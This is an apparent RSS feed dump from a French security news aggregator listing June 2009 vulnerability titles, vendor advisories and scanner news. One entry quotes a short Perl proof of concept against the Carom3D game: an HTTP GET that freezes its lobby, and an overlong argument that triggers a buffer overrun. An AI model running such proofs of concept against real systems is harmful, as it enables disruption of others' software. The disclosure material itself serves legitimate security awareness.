<item><title>Joomla Component com_pinboard Remote File Upload Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113299.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113299.shtml</guid></item>
<item><title>AN Guestbook 078 g_lang Local File Inclusion Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113297.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113297.shtml</guid></item>
<item><title>PHPEcho CMS 20-rc3 forum XSS Cookie Stealing / Blind Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113296.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113296.shtml</guid></item>
<item><title>LightOpenCMS 01 smartyphp cwd Local File Inclusion Vulnerability</title><description>2009-06-24 21:48:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/113295.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113295.shtml</guid></item>
<item><title>Google closes critical vulnerability in Chrome 2</title><description>2009-06-24 16:45:46 - Governmentsecurity.org :    Less than two weeks after the last vulnerabilities were closed, Googlehas released version 2017233 of Chrome, a security update fixinganother critical vulnerabilityIMAGE IMAGE IMAGE IMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/113135.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113135.shtml</guid></item>
<item><title>Adobe Fixes Critical Shockwave Vulnerability</title><description>2009-06-24 13:46:41 - Threatpost Feed :    Adobe has patched a critical security flaw in its Shockwave Playersoftware which could enable an attacker to gain complete control ofaffected machines The vulnerability affects version 1150596 andearlier of Shockwave</description><link>http://www.secuobs.com/revue/news/113089.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113089.shtml</guid></item>
<item><title>Google Chrome Fixes Buffer Overflow Vulnerability</title><description>2009-06-23 21:02:46 - CGISecurity  Website and Application Security News : "Google Chrome 2017233 has been released to the Stable and Betachannels This release fixes a critical security issue and two othernetworking bugs CVE-2009-2121: Buffer overflow processing HTTPresponsesGoogle Chrome is vulnerable to a buffer overflow in handlingcertain responses from HTTP servers A specially crafted response froma server</description><link>http://www.secuobs.com/revue/news/112837.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112837.shtml</guid></item>
<item><title>US-CERT Releases Cyber Security Vulnerability Summary</title><description>2009-06-23 20:23:48 - Infosecurity.US :  US-CERT has released the agency’s’s Cyber Security Bulletin SB09-173 — avulnerability summary targeting reported events of last week Thescope of the report is breathtaking, the fundamentals of whichconsistently point to code cruft, sheer coding incompetence, andother, equally disturbing architectural problems pushing ourelectronic bits about SQL Injection, media file vulnerabilities,Linux </description><link>http://www.secuobs.com/revue/news/112808.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112808.shtml</guid></item>
<item><title>AWScripts Gallery Search Engine 1x Insecure Cookie Vulnerability</title><description>2009-06-22 23:58:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112426.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112426.shtml</guid></item>
<item><title>Gravy Media Photo Host 108 Local File Disclosure Vulnerability</title><description>2009-06-22 23:58:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112424.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112424.shtml</guid></item>
<item><title>Sourcebans = 142 Arbitrary Change Admin Email Vulnerability</title><description>2009-06-22 23:58:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112422.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112422.shtml</guid></item>
<item><title>RS-CMS 21 key Remote SQL Injection Vulnerability</title><description>2009-06-22 23:58:46 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112420.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112420.shtml</guid></item>
<item><title>MIDAS 143 Auth Bypass Insecure Cookie Handling Vulnerability</title><description>2009-06-22 19:56:45 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112334.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112334.shtml</guid></item>
<item><title>pc4 Uploader = 100 Remote File Disclosure Vulnerability</title><description>2009-06-22 19:56:45 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/112333.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112333.shtml</guid></item>
<item><title> OWASP Joomla vulnerability scanner</title><description>2009-06-22 19:37:43 - Help Net Security  News : Joomla is one of the most widely-used content management systemsWatching its vulnerabilities can be a daunting taks JoomScan can helpweb developers identify possible security weaknesses on their </description><link>http://www.secuobs.com/revue/news/112293.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112293.shtml</guid></item>
<item><title>IOS HTTP Server Command Injection Vulnerability</title><description>2009-06-20 00:41:50 - Cisco Security AdvisoriesSearch Cisco : A vulnerability exists in the IOS HTTP server in which HTML code insertedinto dynamically generated output, such as the output from a showbuffers command, will be passed to the browser requesting the pageThis HTML code could be interpreted by the client browser andpotentially execute malicious commands against the device or otherpossible cross-site scripting attacks Successful exploitation of thisvulnerability requires that a user browse a page containing dynamiccontent in which HTML commands have been injectedIMAGE</description><link>http://www.secuobs.com/revue/news/111757.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111757.shtml</guid></item>
<item><title>Using SQLMap for Automated Vulnerability Assessment</title><description>2009-06-19 22:23:20 - MadIrish.net : Vulnerability assessors and code auditors are often faced with situationswhere a large volume of code needs to be audited quickly to enable adeployment In these situations large web applications need to bereviewed in a fast and efficient manner Although a code levelanalysis is often the most effective way to analyse the security of anapplication it is a time consuming process and not all practical Inthese situations testers often turn to automated tools to helpdiscover vulnerabilitieshttp://wwwmadirishnet/article=231etfrom=rss</description><link>http://www.secuobs.com/revue/news/111709.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111709.shtml</guid></item>
<item><title>Joomla Vulnerability Scanner Released</title><description>2009-06-19 21:55:36 - Security for the Masses : OWASP has released it's Joomla Vulnerability Scanner, v001Read more at Security-DatabasIMAGE</description><link>http://www.secuobs.com/revue/news/111679.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111679.shtml</guid></item>
<item><title>OWASP Joomla Vulnerability Scanner v001 released</title><description>2009-06-19 17:56:45 - Security Database Tools Watch : A regularly-updated signature-based scanner that can detect fileinclusion, sql injection, command execution, XSS, DOS, directorytraversal vulnerabilities of a target Joomla web siteThe following features are currently availableExact version Probing the scanner can tell whether a target isrunning version 159Searching known vulnerabilities of Joomla and its componentsReporting to Text et HTML outputImmediate update capability via scanner or svnChanges :New and  - Security Tools / Owasp, Vulnerability Scanner,Application Scanner, Joomla ScannerIMAGE IMAGE IMAGE IMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/111600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111600.shtml</guid></item>
<item><title>Acunetix Web Vulnerability Scanner WVS 65</title><description>2009-06-19 17:04:45 - bLackhammer.org : Combine this with the Session Auto Recognition module, which willidentify when a logged in session is invalided or expired and willre-login automatically and you have a great tool for scanningauthentication based web applications There is also a lot moresupport for JSP/Tomcat based application, I haven’t had chance to testthis as I </description><link>http://www.secuobs.com/revue/news/111569.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111569.shtml</guid></item>
<item><title>Acunetix Web Vulnerability Scanner WVS 65 Released</title><description>2009-06-19 14:17:54 - Darknet  The Darkside : </description><link>http://www.secuobs.com/revue/news/111531.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111531.shtml</guid></item>
<item><title>web vulnerability scanners e ferramentas de segurança de redes</title><description>2009-06-18 15:09:53 - Security Bloggers Network : Dois tops:Top 10 Web Vulnerability ScannersTop 100 Network SecurityToolsfonte: insecureorgblog Segurança Informáticahttp://wwwseguranca-informaticanet/</description><link>http://www.secuobs.com/revue/news/111176.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/111176.shtml</guid></item>
<item><title>phportal 10 Insecure Cookie Handling Vulnerability</title><description>2009-06-18 01:46:16 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/110977.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110977.shtml</guid></item>
<item><title>phpFK 703 page_bottomphp Local File Inclusion Vulnerability</title><description>2009-06-17 19:25:26 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/110834.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110834.shtml</guid></item>
<item><title>XOOPS = 233 Remote File Disclosure Vulnerability htaccess</title><description>2009-06-17 04:00:30 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/110521.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110521.shtml</guid></item>
<item><title>Carom3D 506 Unicode Buffer Overrun/DoS Vulnerability</title><description>2009-06-16 23:43:15 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/110454.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110454.shtml</guid></item>
<item><title>Apple gets around to plugging Java vulnerability</title><description>2009-06-16 23:15:41 - The Tech Herald Security News : Apple finally released the long awaited patch for a Java vulnerabilitythat they have been aware of for several months on Monday</description><link>http://www.secuobs.com/revue/news/110417.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110417.shtml</guid></item>
<item><title>6/16: TrojanAmoevae Exploits Windows Vulnerability</title><description>2009-06-16 20:23:27 - Alerts : TrojanAmoevae is a Trojan horse that exploits the Microsoft DirectXDirectShow QuickTime Video Remote Code Execution Vulnerability BID35139 to execute arbitrary code and download files on to thecompromised computer</description><link>http://www.secuobs.com/revue/news/110382.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110382.shtml</guid></item>
<item><title>Carom3D 506 Unicode Buffer Overrun/Denial Of Service Vulnerability</title><description>2009-06-16 08:11:38 - LiquidWorm's Blog :    #/usr/bin/perl## Title: Carom3D 506 Unicode Buffer Overrun/Denial Of Service Vulnerability### Summary: Carom 3D is an online multi-user billiard game created with special#    3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8#    ball and other Billiard games to life## Product Web Page: http://wwwcarom3dcom/## Description: The world famous korean game Carom3D suffers from a buffer overflow#        and a denial of service vulnerability The BoF is triggered at#        runtime when we append 218  bytes as an argument ~1000 bytes#        overwrites SEH The denial of service is triggered when a user#        creates a LAN Game cred needed, creates a room and awaits#        other players to join the game While awaiting listening on port#        28012, with a simple HTTP GET/POST, an attacker can lockdown#        the GUI of the user created the room, not alowing to start or#        even exit the game's GUI, unless forced quit X## Tested On: Microsoft Windows XP Professional SP3 English## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic## liquidworm gmail com## http://wwwzeroscienceorg/## 15062009## ----------------------------------DoS---------------------------------- #use LWP::Simple;my $url = 'http://19216813:28012';my $lockdown = get $url;die "Couldn't get $url" unless defined $lockdown;# You can Ctrl+C, the lockdown is ON# ---------------------------------/DoS---------------------------------- ############################################################################# ----------------------------------BoF---------------------------------- ## Added 217 bytes as argument = runs normally# Added 218 bytes as argument triggers the MS VC++ Runtime Library# 'Buffer Overrun' error msg box informing us that the program's# internal state is corruptedsystem'C:\Progra~1\Neoact\Carom3D\caromexe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';# ---------------------------------/BoF---------------------------------- #http://zeroscienceorg/codes/carom3dtxtIMAGE</description><link>http://www.secuobs.com/revue/news/110125.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110125.shtml</guid></item>
<item><title>Apple finally issues patch for critical Java vulnerability</title><description>2009-06-16 03:39:32 - Ars Technica  Security : companion photo for Apple finally issues patch for "critical" Java vulnerabilityApple has finally issued a patch for a critical Java vulnerability inMac OS X that made headlines last month The update comes as part ofJava for Mac OS X 105 Update 4, a 158MB download from both Apple'swebsite and Software Update and requires Mac OS X 1057According to Apple, the update "delivers improved reliability,security, and compatibility for Java SE 6, J2SE 50 and J2SE 142"This includes one vulnerability related to de-serializing certain Javaobjects, which could result in arbitrary code running outside of theJVM's sandbox with the same privileges as the current user It wasreported to Sun in August 2008, and in December 2008 Sun disclosed thevulnerability and issued a patch Despite recent security updates fromApple, however, researchers blasted Apple for not having patched thevulnerability in Mac OS X yetClick here to read the rest of this articleIMAGEIMAGEIMAGE</description><link>http://www.secuobs.com/revue/news/110034.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110034.shtml</guid></item>
<item><title>WordPress Plugin Photoracer 10 id SQL Injection Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109999.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109999.shtml</guid></item>
<item><title>Netgear DG632 Router Authentication Bypass Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109997.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109997.shtml</guid></item>
<item><title>Netgear DG632 Router Remote Denial of Service Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109996.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109996.shtml</guid></item>
<item><title>vBulletin Radio and TV Player Add-On HTML Injection Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109995.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109995.shtml</guid></item>
<item><title>phportal v1 topiclerphp id Remote SQL Injection Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109994.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109994.shtml</guid></item>
<item><title>The Recipe Script 5 Remote XSS Vulnerability</title><description>2009-06-15 23:59:17 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109993.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109993.shtml</guid></item>
<item><title>Security Focus: Multiple Kaspersky Products PDF File Scan Evasion Vulnerability</title><description>2009-06-15 21:37:28 - Rootsecure.net : Security Focus: Multiple Kaspersky Products PDF File Scan EvasionVulnerability</description><link>http://www.secuobs.com/revue/news/109954.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109954.shtml</guid></item>
<item><title>MS09-023 - Moderate: Vulnerability in Windows Search Could Allow Information Disclosure 963093</title><description>2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Moderate - This security update resolves aprivately reported vulnerability in Windows Search The vulnerabilitycould allow information disclosure if a user performs a search thatreturns a specially crafted file as the first result or if the userpreviews a specially crafted file from the search results By default,the Windows Search component is not installed on Microsoft Windows XPand Windows Server 2003 It is an optional component available fordownload Windows Search installed on supported editions of WindowsVista and Windows Server 2008 is not affected by this vulnerability</description><link>http://www.secuobs.com/revue/news/109939.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109939.shtml</guid></item>
<item><title>MS09-024 - Critical: Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution 957632</title><description>2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves aprivately reported vulnerability in the Microsoft Works convertersThe vulnerability could allow remote code execution if a user opens aspecially crafted Works file An attacker who successfully exploitedthis vulnerability could gain the same user rights as the local userUsers whose accounts are configured to have fewer user rights on thesystem could be less impacted than users who operate withadministrative user rights</description><link>http://www.secuobs.com/revue/news/109938.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109938.shtml</guid></item>
<item><title>MS09-026 - Important: Vulnerability in RPC Could Allow Elevation of Privilege 970238</title><description>2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Important - This security update resolves apublicly disclosed vulnerability in the Windows remote procedure callRPC facility where the RPC Marshalling Engine does not update itsinternal state appropriately The vulnerability could allow anattacker to execute arbitrary code and take complete control of anaffected system Supported editions of Microsoft Windows are notdelivered with any RPC servers or clients that are subject toexploitation of this vulnerability In a default configuration, userscould not be attacked by exploitation of this vulnerability However,the vulnerability is present in the Microsoft Windows RPC runtime andcould affect third-party RPC applications</description><link>http://www.secuobs.com/revue/news/109936.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109936.shtml</guid></item>
<item><title>Mundi Mail 082 top Remote File Inclusion Vulnerability</title><description>2009-06-15 20:37:42 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109885.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109885.shtml</guid></item>
<item><title>SugarCRM 520e Remote Code Execution Vulnerability</title><description>2009-06-15 20:37:42 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109884.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109884.shtml</guid></item>
<item><title>DB Top Sites 10 indexphp u Local File Inclusion Vulnerability</title><description>2009-06-15 20:37:42 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109881.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109881.shtml</guid></item>
<item><title>Apple Safari  Quicktime Denial of Service Vulnerability</title><description>2009-06-15 20:37:42 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109876.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109876.shtml</guid></item>
<item><title>Femitter Server FTP 1x Multiple Vulnerability</title><description>2009-06-14 14:09:26 - Shellstorm.org : </description><link>http://www.secuobs.com/revue/news/109472.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109472.shtml</guid></item>
<item><title>Fun Job Open at Qualys: Director of Vulnerability Research</title><description>2009-06-13 22:37:45 - Security Bloggers Network : Here is a fun job open at Qualys: Director of VulnerabilityResearchDescriptionThe Director of Vulnerability Research will beresponsible for ensuring that our vulnerability and compliancesignatures and detections are kept up to date on the latest te</description><link>http://www.secuobs.com/revue/news/109405.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109405.shtml</guid></item>
<item><title>Streamline Vulnerability Management with the Active View</title><description>2009-06-13 06:30:38 - Webinars : 1:00 pm CST Only open to current Clients and Partners</description><link>http://www.secuobs.com/revue/news/109318.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109318.shtml</guid></item>
<item><title>WordPress Plugin FireStats = 161fs_javascript RFI Vulnerability</title><description>2009-06-13 00:15:44 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109227.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109227.shtml</guid></item>
<item><title>Zip Store Chat 40/50 Auth Bypass SQL Injection Vulnerability</title><description>2009-06-12 17:01:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109045.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109045.shtml</guid></item>
<item><title>4images = 177 Filter Bypass HTML Injection/XSS Vulnerability</title><description>2009-06-12 17:01:14 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/109044.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/109044.shtml</guid></item>
<item><title>More Value w/ Web Vulnerability Management</title><description>2009-06-12 04:22:23 - Security Bloggers Network : the good newsJPGIn the past we wrote several times about SecureSphereintegration with Web vulnerability scanners In the past I wrote howSecureSphere can be used for Web vulnerability managementThere's an important update The current shipping version ofSecureSphere provides out-of-the box integration with additionalvulnerability scanners:* Cenzic ClickToSecure and Hailstorm* HP WebInspect* IBM AppScan* NTObjectives NTOspider* WhiteHat SentinelAfter a scanner has completed its task, scan results are received andSecureSphere automatically creates user-editable security policiesthat mitigate detected vulnerabilities The mitigated vulnerabilitiesare saved in a database and the user can generate various reportsabout themCheck the SecureSphere WAF Enterprise Edition user guide forconfiguration instructions</description><link>http://www.secuobs.com/revue/news/108871.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108871.shtml</guid></item>
<item><title>Slides Intelligent Debugging for Vulnerability Analysis and Exploit Development</title><description>2009-06-12 01:58:39 - SecDocs Feed : </description><link>http://www.secuobs.com/revue/news/108812.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108812.shtml</guid></item>
<item><title>Video Intelligent Debugging for Vulnerability Analysis and Exploit Development</title><description>2009-06-12 01:58:39 - SecDocs Feed : </description><link>http://www.secuobs.com/revue/news/108811.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108811.shtml</guid></item>
<item><title>TorrentVolve 14 deleteTorrent Delete Arbitrary File Vulnerability</title><description>2009-06-11 23:24:05 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/108732.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108732.shtml</guid></item>
<item><title>Multiple Vendor WebKit Error Handling Use After Free Vulnerability</title><description>2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/108730.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108730.shtml</guid></item>
<item><title>Adobe Reader and Acrobat FlateDecode Integer Overflow Vulnerability</title><description>2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/108729.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108729.shtml</guid></item>
<item><title>Microsoft Windows 2000 Print Spooler Remote Stack Buffer Overflow Vulnerability</title><description>2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/108728.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108728.shtml</guid></item>
<item><title>Microsoft Excel SST Record Integer Overflow Vulnerability</title><description>2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/108727.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108727.shtml</guid></item>
<item><title>Microsoft Active Directory Hexdecimal DN AttributeValue Invalid Free Vulnerability</title><description>2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : </description><link>http://www.secuobs.com/revue/news/108726.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108726.shtml</guid></item>
<item><title>H Security: Google closes vulnerabilities in Chrome 2 A vulnerability in WebKit can be exploited by an attacker to crash a tab or execute arbitrary code in Google Chrome</title><description>2009-06-11 11:32:58 - Rootsecure.net : H Security: Google closes vulnerabilities in Chrome 2 "A vulnerability inWebKit can be exploited by an attacker to crash a tab or executearbitrary code in Google Chrome"</description><link>http://www.secuobs.com/revue/news/108428.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108428.shtml</guid></item>
<item><title>School Data Navigator page Local/Remote File Inclusion Vulnerability</title><description>2009-06-10 19:52:43 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/108106.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108106.shtml</guid></item>
<item><title>100,000 UK Web Sites Obliterated, Virtualized Zero Day Vulnerability Blamed…</title><description>2009-06-10 19:47:53 - Infosecurity.US :  News, overnight, of the apparent destruction, and subsequent data loss,of an estimated one hundred thousand websites hosted in the UnitedKingdom at VASERV Evidence point to a virtulization exploit - atleast from the perspective of the ISP The truth probably residessomewhere between appalling poor securityassessment/management/policies and vulnerabilities in their hosted,virtualized platforms,; </description><link>http://www.secuobs.com/revue/news/108102.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108102.shtml</guid></item>
<item><title> Vulnerability in Internet Explorer discovered by Core Security Technologies</title><description>2009-06-10 14:39:56 - Help Net Security  News : Core Security Technologies issued an advisory disclosing a vulnerabilitythat could affect millions of individuals and businesses usingMicrosofts Internet Explorer web browsing software A vulner</description><link>http://www.secuobs.com/revue/news/107970.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107970.shtml</guid></item>
<item><title>MRCGIGUY Hot Links reportphp id Remote SQL Injection Vulnerability</title><description>2009-06-09 23:51:13 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107703.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107703.shtml</guid></item>
<item><title>Joomla Component com_realestatemanager 10 RFI Vulnerability</title><description>2009-06-09 23:51:13 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107702.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107702.shtml</guid></item>
<item><title>Joomla Component com_vehiclemanager 10 RFI Vulnerability</title><description>2009-06-09 23:51:13 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107701.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107701.shtml</guid></item>
<item><title>Kaspersky Silent Patch Fail for Latest Vulnerability</title><description>2009-06-09 22:00:46 - Security for the Masses : Kaspersky seems to have roiled security researcher Thierry Zoller withhow it handles it's vulnerabilities Read more about the latest flaw,Kaspersky PDF evasion, at SecDevIMAGE</description><link>http://www.secuobs.com/revue/news/107658.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107658.shtml</guid></item>
<item><title>Joomla Component Akobook 23 gbid SQL Injection Vulnerability</title><description>2009-06-09 21:53:50 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107642.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107642.shtml</guid></item>
<item><title>Joomla Component com_media_library 153 RFI Vulnerability</title><description>2009-06-09 21:53:50 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107641.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107641.shtml</guid></item>
<item><title>Vulnerability in virtualization app wipes out 100,000 sites</title><description>2009-06-09 21:38:28 - SOURCE Conference Blog : Vaserve, a UK webhosting company says that 100,000 of its customer siteswere wiped out in what looks like a zero day attack on HyperVM, avirtualization application they used The HyperVM was a product oflxlabs I checked out the lxlabs product documentation and website andcould not find any reference to using a </description><link>http://www.secuobs.com/revue/news/107619.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107619.shtml</guid></item>
<item><title>Apple Safari = 32x XXE attack Local File Theft Vulnerability</title><description>2009-06-09 19:22:52 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107572.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107572.shtml</guid></item>
<item><title>Webhost hacked  VM vulnerability blamed</title><description>2009-06-09 19:12:11 - Security Bloggers Network : According to the Register, a hacker attacked a Webhosting company’svirtual server infrastructure on Sunday and erased up to 100,000sites Vaservcom was hit by a calculated attack on its virtualizationapplication which left roughly half of Vaserv’s customer without</description><link>http://www.secuobs.com/revue/news/107551.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107551.shtml</guid></item>
<item><title>IT pros fear hacking vulnerability but doing little about it</title><description>2009-06-09 03:32:44 - Hack In The Box : Almost three quarters 73% of IT professionals admit that their softwareis still vulnerable to hackers â just 8% down on last year'srevelation That's chief among findings by application securityspecialist Fortify Software â which also finds 46% believing thathacking at the application level is the easiest way into any companytoday That is significant â Fortify makes the point that it's 33%up on last year and in line with research that demonstratessignificant growth in hacks targeted at applications What's more,Fortify finds one third of IT pros thinking that buying externalapplications poses a greater security threat than writing them inhouse That said, 35% don't consider checking externally procuredapplications for flaws or vulnerabilities â although 55% say they'renow worried because it wasn't made a priority for developers Afurther 21% were disturbed because it is at the bottom of everyone'smind</description><link>http://www.secuobs.com/revue/news/107231.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107231.shtml</guid></item>
<item><title>Joomla Component com_portafolio cid SQL injection Vulnerability</title><description>2009-06-09 00:17:38 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107171.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107171.shtml</guid></item>
<item><title>Joomla Component MooFAQ com_moofaq LFI Vulnerability</title><description>2009-06-08 22:24:37 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107136.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107136.shtml</guid></item>
<item><title>Frontis 390124 source_class Remote SQL Injection Vulnerability</title><description>2009-06-08 22:24:37 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107134.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107134.shtml</guid></item>
<item><title>DM FileManager 392 Insecure Cookie Handling Vulnerability</title><description>2009-06-08 22:24:37 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107131.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107131.shtml</guid></item>
<item><title>Virtue Classifieds category SQL Injection Vulnerability</title><description>2009-06-08 19:58:06 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107042.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107042.shtml</guid></item>
<item><title>Virtue Book Store cid Remote SQL Injection Vulnerability</title><description>2009-06-08 19:58:06 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107041.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107041.shtml</guid></item>
<item><title>Virtue Shopping Mall cid Remote SQL Injection Vulnerability</title><description>2009-06-08 19:58:06 - milw0rm.com : </description><link>http://www.secuobs.com/revue/news/107040.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107040.shtml</guid></item>
